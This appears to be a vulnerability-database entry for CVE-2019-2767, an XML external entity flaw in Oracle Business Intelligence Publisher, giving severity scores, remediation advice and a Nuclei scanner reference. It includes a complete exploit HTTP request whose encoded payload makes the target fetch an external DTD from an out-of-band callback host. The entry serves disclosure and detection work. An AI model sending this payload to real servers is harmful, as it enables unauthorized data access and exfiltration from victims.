| Title | Oracle Business Intelligence Publisher - XML External Entity Injection |
|---|---|
| Author | madrobot |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system. |
| Remediation | Apply the latest security patches provided by Oracle to fix this vulnerability. |
| CVSS Score | 7.2 |
| EPSS Score | 0.53446 |
| CVE ID | CVE-2019-2767 |
| Tags | cve cve2019 edb oracle xxe oast vkev vuln |
Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//d5jpgl9le0o4jd5edmbgf7hzxy1t1a76p.oast.fun/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-2767.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-2767.pcap
N/AN/A